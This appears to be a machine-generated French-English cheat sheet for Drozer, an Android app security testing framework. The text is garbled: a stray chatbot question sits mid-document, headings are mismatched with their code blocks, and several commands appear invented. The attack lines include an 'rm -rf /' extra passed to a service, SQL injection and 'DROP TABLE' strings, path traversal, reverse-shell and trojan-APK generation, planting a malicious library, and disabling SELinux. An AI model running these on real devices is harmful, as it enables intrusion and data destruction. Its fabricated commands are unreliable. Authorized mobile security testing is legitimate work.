Aide-mémoire Drozer
## Vue d’ensemble
Drozer est un framework complet de test de sécurité pour les applications Android. Il vous permet de prendre le rôle d’une application Android et d’interagir avec la machine virtuelle Dalvik, les points de terminaison IPC d’autres applications et le système d’exploitation sous-jacent. Drozer fournit des outils pour l’exploitation à distance d’appareils Android via des applications malveillantes et l’évaluation complète de la sécurité des applications Android.
⚠️ Avertissement : Utilisez Drozer uniquement sur des appareils et des applications dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test. L’utilisation non autorisée peut violer les conditions de service ou les lois locales.
Installation
Prérequis
Installation sous Linux
Installation sous macOS
Installation sous Windows
Configuration de l’appareil Android
Utilisation de base
Connexion à l’appareil
Commandes de base
Analyse de package
Informations de package
Composants de l’application
Test d’activité
Énumération des activités
Exploitation des activités
Test de service
Énumération des services
Exploitation des services
Test de fournisseur de contenu
Énumération des fournisseurs de contenu
Exploitation des fournisseurs de contenu
Test de récepteur de diffusion
Énumération des récepteurs de diffusion
Exploitation des récepteurs de diffusion
Analyse du système de fichiers
Énumération du système de fichiers
Exploitation du système de fichiers
Would you like me to fill in the remaining sections with placeholder text or leave them blank?```bash
Install Java Development Kit
sudo apt update sudo apt install openjdk-11-jdk
Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo ‘export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64’ >> ~/.bashrc
### Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py installmacOS Installation
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apkWindows Installation
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/Android Device Setup
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415Basic Usage
Connecting to Device
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>Basic Commands
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.appPackage Analysis
Package Information
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3Application Components
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -eActivity Testing
Activity Enumeration
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERAActivity Exploitation
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug trueService Testing
Service Enumeration
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMINService Exploitation
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundServiceContent Provider Testing
Content Provider Enumeration
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.appContent Provider Exploitation
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txtBroadcast Receiver Testing
Broadcast Receiver Enumeration
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETEDBroadcast Receiver Exploitation
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode trueFile System Analysis
File System Enumeration
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/File System Exploitation
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```## Analyse de Base de Données
```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```### Test de Base de Données SQLite
```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
# List network interfaces
dz> run tools.setup.network
# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```## Analyse Réseau
```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app
# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app
# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```### Configuration Réseau
```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager):
name = "Custom Exploit Module"
description = "Custom exploitation module"
examples = "run custom.exploit -a com.example.app"
author = "Security Researcher"
date = "2024-01-01"
license = "BSD (3 clause)"
path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
```### Test SSL/TLS
```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk
# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
# Generate bind shell payload
dz> run payload.bind.shell --port 4444
# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```## Exploitation Avancée
```bash
# Check for root access
dz> run tools.setup.busybox
# Exploit setuid binaries
dz> run exploit.setuid.find
# Test for kernel exploits
dz> run exploit.kernel.check
# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app
# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```### Développement de Module Personnalisé
```python
#!/usr/bin/env python2
import subprocess
import json
import sys
class DrozerAutomation:
def __init__(self, package_name):
self.package = package_name
self.results = \\\\{\\\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
# Usage
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py <package_name>")
sys.exit(1)
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
```### Génération de Payload
```bash
#!/bin/bash
# Batch testing script for multiple packages
PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do
echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
```### Escalade de Privilèges
```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity
# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415
# Restart ADB server
adb kill-server
adb start-server
# Check device connectivity
adb devices
# Test connection manually
telnet localhost 31415
```## Scripts d'Automatisation
```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk
# Check agent permissions
adb shell dumpsys package com.mwr.dz
# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions
# Check if agent service is running
adb shell ps|grep drozer
```### Script d'Évaluation Complète
```bash
# Refresh module list
dz> reload
# Check module path
dz> list
# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/
# Debug module loading
dz> help custom.module
```### Script de Test par Lot
```bash
# Check required permissions
adb shell dumpsys package com.example.app|grep permission
# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
# Check SELinux status
adb shell getenforce
# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```## Dépannage
```bash
# Increase timeout values
dz> set timeout 30
# Reduce output verbosity
dz> set verbose false
# Clear cache
rm -rf ~/.drozer/cache/
# Use specific device
drozer console connect --device <device_id>
```### Problèmes de Connexion
https://labs.f-secure.com/tools/drozer/##
# Problèmes d'Agent
https://github.com/FSecureLABS/drozer##
# Problèmes de Module
https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf##
# Problèmes de Permissions
https://blog.securelayer7.net/android-penetration-testing-using-drozer/##
# Problèmes de Performance
https://owasp.org/www-project-mobile-security-testing-guide/#
# Ressources
https://developer.android.com/training/articles/security-tips- [Documentation Officielle de Drozer](https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module*Ce mémo fournit une référence complète pour l'utilisation de Drozer pour les tests de sécurité des applications Android. Assurez-vous toujours d'avoir une autorisation appropriée avant de tester des applications ou des appareils Android.*